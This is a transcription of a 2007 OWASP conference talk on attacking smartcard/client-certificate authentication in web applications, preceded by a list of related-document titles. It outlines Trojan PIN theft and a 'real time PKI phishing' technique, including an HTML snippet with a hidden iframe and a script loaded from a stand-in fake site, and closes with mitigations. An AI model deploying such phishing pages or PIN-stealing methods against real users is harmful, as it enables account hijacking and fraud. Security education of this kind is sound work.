The PKI Lie. The OWASP Foundation Attacking Certificate Based Authentication. OWASP & WASC AppSec 2007 Conference

Similar documents
Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Overtaking Google Desktop Leveraging XSS to Raise Havoc. 6 th OWASP AppSec Conference. The OWASP Foundation

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Web Application Security. Philippe Bogaerts

Copyright

Stop sweating the password and learn to love public key cryptography. Chris Streeks Solutions Engineer, Yubico

Vidder PrecisionAccess

CIS 4360 Secure Computer Systems XSS

Web Security, Summer Term 2012

Web Security, Summer Term 2012

WHY CSRF WORKS. Implicit authentication by Web browsers

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

INF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

Multi-Factor Authentication: Security or Snake Oil? Steven Myers Rachna Dhamija Jeffrey Friedberg

Application vulnerabilities and defences

Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 2

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Pro s and con s Why pins # s, passwords, smart cards and tokens fail

Common Websites Security Issues. Ziv Perry

Aguascalientes Local Chapter. Kickoff

Solutions Business Manager Web Application Security Assessment

Towards a uniform solution to identity theft

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

OWASP Thailand. Proxy Caches and Web Application Security. OWASP AppSec Asia October 21, Using the Recent Google Docs 0-Day as an Example

CSCD 303 Essential Computer Security Fall 2018

Wayward Wi-Fi. How Rogue Hotspots Can Hijack Your Data and Put Your Mobile Devices at Risk

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Bank Infrastructure - Video - 1

CSCD 303 Essential Computer Security Fall 2017

Securing Internet Communication: TLS

Progress Exchange June, Phoenix, AZ, USA 1

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Authentication and Password CS166 Introduction to Computer Security 2/11/18 CS166 1

Paystar Remittance Suite Tokenless Two-Factor Authentication

Author: Tonny Rabjerg Version: Company Presentation WSF 4.0 WSF 4.0

SOLUTION BRIEF. Enabling and Securing Digital Business in API Economy. Protect APIs Serving Business Critical Applications

Online Banking Security

Safelayer's Adaptive Authentication: Increased security through context information

CSC 482/582: Computer Security. Cross-Site Security

OpenID Security Analysis and Evaluation

Protecting Against Online Fraud. F5 EMEA Webinar August 2014

Phishing Read Behind The Lines

Authentication Methods

OWASP Top 10 The Ten Most Critical Web Application Security Risks

WEB SECURITY: XSS & CSRF

Deliver Strong Mobile App Security and the Ultimate User Experience

Chrome Extension Security Architecture

C1: Define Security Requirements

Securing Information Systems

Identity Theft, Phishing and Pharming: Accountability & Responsibilities. OWASP AppSec DC October The OWASP Foundation

Ethical Hacking and Countermeasures: Web Applications, Second Edition. Chapter 3 Web Application Vulnerabilities

Topics. Ensuring Security on Mobile Devices

CSCE 813 Internet Security Case Study II: XSS

En partenariat avec CA Technologies. Genève, Hôtel Warwick,

Web Application Penetration Testing

Hacker Attacks on the Horizon: Web 2.0 Attack Vectors

Is Your Online Bank Really Secure?

Secure Frame Communication in Browsers Review

So Many Ways to Slap a YoHo: Hacking Facebook & YoVille

SECURITY TESTING. Towards a safer web world

COPYRIGHTED MATERIAL. Contents. Part I: The Basics in Depth 1. Chapter 1: Windows Attacks 3. Chapter 2: Conventional and Unconventional Defenses 51

GOING WHERE NO WAFS HAVE GONE BEFORE

MBFuzzer - MITM Fuzzing for Mobile Applications

CYBER ATTACKS EXPLAINED: PACKET SPOOFING

Whitepaper on AuthShield Two Factor Authentication with SAP

Cross-Site Request Forgery: The Sleeping Giant. Jeremiah Grossman Founder and CTO, WhiteHat Security

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Evaluating the Security Risks of Static vs. Dynamic Websites

Web Application Threats and Remediation. Terry Labach, IST Security Team

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Security 08. Black Hat Search Engine Optimisation. SIFT Pty Ltd Australia. Paul Theriault

What is Authentication? All requests for resources have to be monitored. Every request must be authenticated and authorized to use the resource.

Building Trust in the Internet of Things

Sichere Software vom Java-Entwickler

Application. Security. on line training. Academy. by Appsec Labs

Hacker Academy Ltd COURSES CATALOGUE. Hacker Academy Ltd. LONDON UK

Cyber Security & Ethical Hacking Training. Introduction to Cyber Security Introduction to Cyber Security. Linux Operating System and Networking: LINUX

Security and Privacy. SWE 432, Fall 2016 Design and Implementation of Software for the Web

Securing Internet Communication

Ethical Hacking. Content Outline: Session 1

MOBILE THREAT LANDSCAPE. February 2018

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Combating Common Web App Authentication Threats

Endpoint Security - what-if analysis 1

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

Security and Authentication

Getting Into Mobile Without Getting Into Trouble

Breaking FIDO Yubico. Are Exploits in There?

Penetration Testing following OWASP. Boyan Yanchev Chief Technology Ofcer Peter Dimkov IS Consultant

Web Security. Thierry Sans

Certified Secure Web Application Engineer

CS 142 Winter Session Management. Dan Boneh

Ethical Hacking as a Professional Penetration Testing Technique ISSA Southern Tier & Rochester Chapters

Securing Your Web Application against security vulnerabilities. Alvin Wong, Brand Manager IBM Rational Software

SPOOFING. Information Security in Systems & Networks Public Development Program. Sanjay Goel University at Albany, SUNY Fall 2006

ICS 351: Today's plan. web scripting languages HTTPS: SSL and TLS certificates cookies DNS reminder

Strong Authentication for Physical Access using Mobile Devices

Exploiting and Defending: Common Web Application Vulnerabilities

Transcription:

The PKI Lie Attacking Certificate Based Authentication Ofer Maor CTO, Hacktics OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 Copyright 2007 - The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the Creative Commons Attribution-ShareAlike 2.5 License. To view this license, visit http://creativecommons.org/licenses/by-sa/2.5/ http://www.webappsec.org/ The OWASP Foundation http://www.owasp.org/

Introduction More and more organizations are examining PKI solutions (client cert authentication) to provide an answer to modern authentication threats This presentation will examine the common notions about PKI in web applications and present various threats This lecture is: NOT going to reveal any flaws in RSA or Digital Signatures technology IS going to present how poor implementation can allow hackers to work around it OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 2

Agenda Common Credential Theft Threats Suggested PKI Authentication Solution Attacks on PKI Implementation Poor Application Integration Trojans PKI Phishing Demo Conclusion Mitigation OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 3

Common Credentials Theft Threats Phishing/Pharming Malicious Links DNS Hijacking Trojan/Malware Online Phishing Against OTP Trojans HTTP Monitoring Key Loggers XSS Attacks Session Hijacking XSS Based Phishing OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 4

Suggested Solution PKI & Client Certs PKI Authentication Combines: Something you Have (Smartcard / Token) Something you Know (PIN) Some modern implementations are seeking to replace the PIN with biometric authentication Authentication requires the physical device to be plugged in (Private key stored on device) The combination of smart card, PIN, and the strength of RSA, is why many consider PKI authentication as hack proof. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 5

The PKI Lie A Hack Proof Solution The Hack Proof notion, urges organizations to switch to PKI based authentication at high costs Financial Organizations Many banks are deploying PKI authentication for customers The solutions are considered so secure that previous Phishing/Pharming warnings are removed! Governments Digital signatures are now legally valid In some countries they are considerably more abiding than normal signatures OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 6

The PKI (sad) Truth PKI Authentication is not Hack Proof Secure in Theory Very strong encryption & authentication algorithms Verified robust implementation (Common Criteria) Fails in Practice: Integration of the solution with the surrounding environment may allow compromise End Point Integration (PC/User) Web Application Integration Allows performing real time attacks OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 7

Application Integration Flaws Poor Authentication Verification by Application Poor Session Integration Relying on session information for authentication No binding of application session and SSL session XSS Vulnerabilities Data Theft Execution of Operations Invocation of Signing Operations (if cached) The sky is the limit OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 8

Client Side Attacks Trojans Trojans - No #1 Pharming Technique But also useful for direct data compromise OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 9

Client Side Attacks - Trojans Complete takeover of smartcard / token The Simple Way Cached PIN The Hard Way Stealing & Using PIN Step #1 Obtaining PIN Key Loggers USB Sniffers (Encryption might be a problem ) Driver Manipulation Step #2 Utilizing Card GUI Based Macro (Visible to user ) Direct DLL Access Silent Mode OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 10

Client Side Attacks - Phishing One of the most prominent attacks today Surely solved by PKI (or not?) OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 11

Real Time PKI Phishing - Overview Real Time Phishing provides a mean for overcoming the need of credentials theft. Rather than being stolen, the credentials are used in real time, while the device is plugged Once hijacked, the attacker can exploit the existing credentials using CSRF, Reflected XSS or other means As common with other CSRF/XSS attacks, the user has little, if any, way of preventing this. OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 12

Real Time PKI Phishing - Analysis The attack is performed by creating a faked site (much like regular Phishing attacks) The site has no content, and contains 2 frames: Frame I - Uses entire screen area and presents the real site Frame II Invisible, and is used for taking advantage of the logged on user Utilizing cross domain techniques (CSRF, JavaScript inclusion, etc.) Frame II, already authenticated, is used to launch attacks OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 13

Real Time PKI Phishing - Flow User follows link to malicious (Phished) site The response includes an empty content HTML, as following: <HTML> <IFRAME WIDTH=100% HEIGHT=100% NAME=REAL FRAMEBORDER=1 SRC= http://www.myrealsite.com/ ></IFRAME> <IFRAME WIDTH=0% HEIGHT=0% NAME=EVIL FRAMEBODER=1> </IFRAME> <SCRIPT SRC=http://www.myFAKEsite.com/dobad.js></SCRIPT> </HTML> OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 14

Real Time PKI Phishing Flow (Cont d) The user is then presented with the Certificate selection The user experience is IDENTICAL OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 15

Real Time PKI Phishing Flow (Cont d) Once the user has logged on, the user is able to browser through the site The malicious site is now able to perform navigation events on the 2 nd IFrame. This allows execution of any operation in the site on behalf of the user OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 16

Real Time PKI Phishing Demo OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 17

Real Time PKI Phishing Limitations Data Viewing May not be possible (Cross Site Limitations) Relies on CSRF Capabilities (Won t work well in.net ) However both limitations are easily bypassed with Reflected XSS The Phishing site provides the persistency platform XSS can then be used to access sensitive data XSS can also be used to obtaining whatever random data required to overcome CSRF protection OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 18

Additional Real Time PKI Phishing Aspects Proprietary ActiveX based authentication (As opposed to integrated browser certificates) Identifying when the main frame has been successfully authenticated can be performed using cross domain exploits (e.g. JS includes) Man in the Middle Techniques An Alternative to CSRF/XSS Attacks Establish a connection with the client, and relay the challenge from the original server to the client. Might generate some warnings, but users tend to ignore those OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 19

Conclusion Embedding PKI authentication in web applications is not a magic solution! Trojans, Pharming, Phishing, CSRF, XSS, as well as other applications vulnerabilities, remain a significant concern These problems must be addressed well before implementing client side certificates With that said client side certificates stored on secure physical device are still a very strong form of authentication OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 20

Mitigation CSRF Protection Massively discussed yesterday XSS Protection Massively discussed for the past few years Trojans Protection Tricky (Requires taking the PC out of the equation ) On-Device PIN Input & Verification On-Device Biometric Verification On-Device OK confirmation Clean From-Device OS Boot (Might work with virtualization as well ) OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 21

Thank You! Questions? OWASP & WASC AppSec 2007 Conference San Jose Nov 2007 22

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback